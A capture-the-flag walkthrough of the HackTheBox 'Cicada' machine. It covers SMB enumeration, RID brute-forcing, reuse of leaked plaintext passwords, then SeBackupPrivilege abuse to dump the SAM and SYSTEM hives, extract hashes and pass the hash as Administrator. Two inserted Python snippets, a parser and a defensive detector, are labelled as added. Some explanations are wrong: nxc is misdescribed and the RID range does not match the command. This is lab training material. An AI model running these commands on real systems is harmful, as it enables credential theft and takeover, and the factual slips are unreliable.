InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties…


Cicada Walkthrough — HackTheBox

MrXcrypt
Published in InfoSec Write-ups
6 min read · Feb 16, 2025

Introduction

In this write-up, we’ll go through an easy Windows machine where we gain an initial foothold through SMB exploration and subsequently achieve privilege escalation using the SeBackupPrivilege feature.

Reconnaissance

  1. After starting the machine, I set the target IP as the $target environment variable and ran an nmap scan.

Command — Port Scan: Nmap

nmap $target --top-ports=1000 -sV -v -sC -Pn > nmap.out

2. Then, as usual, I added the host cicada.htb to /etc/hosts.

3. As SMB was open, I used smbclient to check whether any share accepts ‘anonymous’ login.

Command — SMB Shares Listing: smbclient

smbclient -L 10.10.11.35

4. I was able to enumerate the share ‘HR’, where I found a file called ‘Notice from HR.txt’.

5. After downloading that file, I found a password mentioned in it.

6. Now I have a password, but no username. To find users on that server, I used nxc to enumerate usernames over SMB by brute-forcing RIDs.

Command — Finding Users in SMB: nxc

nxc smb 10.10.11.35 -u 'anonymous' -p '' --rid-brute 3000

What is nxc?

nxc is a tool from the Nmap scripting engine to enumerate and exploit SMB (Server Message Block) services on Windows machines. In this context, RID stands for Relative Identifier. We’re using a brute-force approach to target RIDs ranging from 1000 to 4000, which typically encompasses common user accounts. This method lets us gather details about those users in the SMB environment.

7. Let’s take all the users (SidTypeUser) and put them in a separate file, ‘usernames.txt’.
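As an added example (not part of the original write-up), here is a small parser that does step 7 on nxc --rid-brute output: it keeps only SidTypeUser entries, drops machine accounts and strips the DOMAIN\ prefix, and also marks well-known RIDs below 1000. The sample output, its RIDs and the ‘Dev Support’ group are constructed, not captured from the box.

```python
import re
from typing import Dict, List

# Constructed sample of nxc --rid-brute output (not captured from the box);
# the real tool prints one line per resolved RID in roughly this shape.
# RIDs and the 'Dev Support' group are placeholders.
NXC_RID_OUTPUT = """\
SMB  10.10.11.35  445  CICADA-DC  500: CICADA\\Administrator (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  501: CICADA\\Guest (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  512: CICADA\\Domain Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1104: CICADA\\michael.wrightson (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1105: CICADA\\david.orelious (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1106: CICADA\\emily.oscars (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1107: CICADA\\Dev Support (SidTypeGroup)
"""

# "<rid>: <DOMAIN>\<name> (<SidType>)" at the end of each line
RID_LINE = re.compile(r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)\s*$")


def parse_rid_brute(output: str) -> List[Dict]:
    """Turn nxc --rid-brute lines into records: rid, domain, name, SID type."""
    records = []
    for line in output.splitlines():
        m = RID_LINE.search(line)
        if not m:
            continue
        rid = int(m.group("rid"))
        records.append({
            "rid": rid,
            "domain": m.group("domain"),
            "name": m.group("name"),
            "type": m.group("type"),
            # RIDs below 1000 are reserved for well-known principals
            # (500 Administrator, 501 Guest, 512 Domain Admins, ...);
            # accounts created in the domain get RIDs from 1000 upwards.
            "builtin": rid < 1000,
        })
    return records


def user_accounts(records: List[Dict]) -> List[str]:
    """Step 7 of the write-up: keep SidTypeUser entries, drop machine accounts
    (names ending in '$') and strip the DOMAIN\\ prefix for usernames.txt."""
    return [r["name"] for r in records
            if r["type"] == "SidTypeUser" and not r["name"].endswith("$")]

if __name__ == "__main__":
    print("\n".join(user_accounts(parse_rid_brute(NXC_RID_OUTPUT))))
```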

8. Now, I didn’t know which user the password I found above belonged to. ChatGPT told me to try hydra, but hydra didn’t work. After searching a bit, I decided to try each username with ‘enum4linux’.

Command — Enumerating Users via SMB: enum4linux-ng

python3 enum4linux-ng.py -A -u 'Michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35

What is Enum4linux?

Enum4linux is a tool used primarily for enumerating information from Windows machines via the SMB (Server Message Block) protocol. It helps gather information about the target system, user accounts, shares and other network resources.

What is RPC?

RPC stands for Remote Procedure Call, a protocol that allows a program to execute a function on another computer in a network as if it were local. It enables communication and function execution between different systems without needing the user to worry about the underlying details of the network communication.

9. Now I found another password, for another user, ‘david.orelious’.

10. I can use this password to explore SMB further, because I wasn’t able to access the ‘DEV’ share before.

Command — SMB Shares Listing for user ‘david.orelious’: smbclient

smbclient //10.10.11.35/DEV -U david.orelious

11. There is a ps1 file in the ‘DEV’ SMB share. In it, I found another password, for the user ‘emily.oscars’.

Initial Foothold — User Flag

  1. This file automates backing up a folder ‘smb’ to a destination folder ‘Backup’. To do this, it uses a set of credentials, so this must be the password for that user on the server. Let’s try evil-winrm.

If you want to know what evil-winrm is, read the article below:

Command — Login as user ‘emily.oscars’: evil-winrm

evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

2. I got an initial foothold as the emily.oscars user. The user flag can be found in the Desktop folder.

Privilege Escalation — Root Flag

  1. While doing privilege escalation, it’s essential to check the current user’s details and privileges.

Command — Info about Current user: whoami

whoami /all

2. As you can see, ‘SeBackupPrivilege’ is enabled for our user ‘emily.oscars’.

What is SeBackupPrivilege?

SeBackupPrivilege was designed to allow users to create backup copies of the system. Since it is not possible to back up something that you cannot read, this privilege comes at the cost of giving the user full read access to the file system: to do its job, it bypasses any ACL that the Administrator has placed in the network.

Read the article below to understand how this privilege escalation works:

3. The ‘emily.oscars’ user has the ability to read any file on the system because of ‘SeBackupPrivilege’. We can use this to read two important files, ‘SAM’ and ‘SYSTEM’, which can be used to achieve this privilege escalation.

What are the ‘SAM’ and ‘system’ files?

SAM and SYSTEM are critical Windows registry files (hive files) that store important information about user accounts, passwords and system settings.

The SAM file is a database that stores local user account information, including password hashes, for users on the machine.

The SYSTEM file contains information related to the system’s configuration, such as the machine’s hardware settings, and more importantly, the encryption keys used to secure the password hashes stored in the SAM file.

4. To avoid detection by Windows, I first moved to the Temp folder, then saved a copy of the SAM and SYSTEM hives there.

Commands — saving SAM & SYSTEM files: reg

reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

5. Now, let’s download the two files to our system with the ‘download’ command in evil-winrm.

6. I then used ‘secretsdump.py’ from impacket to extract the password hashes from the sam & system files.

Command — Extract password hashes from sam & system files: secretsdump.py

python3 /home/mrrobot/Downloads/AD/impacket/examples/secretsdump.py -sam sam -system system LOCAL > adminsecret.txt

7. Now I have the Administrator password hash, which can be used with evil-winrm again to get root access. secretsdump prints it as LM:NT; evil-winrm takes the NT half with -H.

Command — Login as Administrator: evil-winrm

evil-winrm -i cicada.htb -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
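From the defender’s side, the hive-dump steps above (SeBackupPrivilege on the logon, then reg save of SAM and SYSTEM) leave a recognisable trail in the Security log. As an added example that is not part of the original write-up, the following detection runs over constructed, simplified 4672/4688 events; the account names svc_backup and alice.example and all event contents are made up.

```python
import re
from typing import Dict, Iterable, List

# Constructed, simplified Security-log events (not real logs). Field names follow
# the Windows events: 4672 = special privileges assigned to a new logon,
# 4688 = process creation (requires command-line auditing to be enabled).
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 4672, "SubjectUserName": "emily.oscars",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"},
    {"EventID": 4688, "SubjectUserName": "emily.oscars",
     "CommandLine": r"reg save hklm\sam c:\Temp\sam"},
    {"EventID": 4688, "SubjectUserName": "emily.oscars",
     "CommandLine": r"reg  save HKLM\SYSTEM c:\Temp\system"},
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "CommandLine": r"wbadmin start backup -backupTarget:E:"},
    {"EventID": 4688, "SubjectUserName": "alice.example",
     "CommandLine": r"reg query hklm\software\Microsoft"},
]

# reg.exe saving one of the three hives that secretsdump consumes
HIVE_SAVE = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|system|security)\b",
                       re.IGNORECASE)


def detect_hive_dump(events: Iterable[Dict]) -> List[str]:
    """Flag 'reg save' of SAM/SYSTEM/SECURITY, rating it high when the same
    account was granted SeBackupPrivilege earlier in the stream.

    4672 alone is noisy (every administrative logon carries SeBackupPrivilege),
    so the privilege is used as context for the hive save, not as an alert.
    """
    backup_accounts = set()
    alerts = []
    for ev in events:
        user = ev.get("SubjectUserName", "")
        if ev["EventID"] == 4672 and "SeBackupPrivilege" in ev.get("PrivilegeList", ""):
            backup_accounts.add(user.lower())
        elif ev["EventID"] == 4688:
            m = HIVE_SAVE.search(ev.get("CommandLine", ""))
            if m:
                severity = "high" if user.lower() in backup_accounts else "medium"
                alerts.append(f"{severity}: {user} saved {m.group(1).upper()} hive "
                              f"via: {ev['CommandLine']}")
    return alerts

if __name__ == "__main__":
    for alert in detect_hive_dump(SAMPLE_EVENTS):
        print(alert)
```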

Now we are ROOT! Thanks for reading. Happy hacking!!
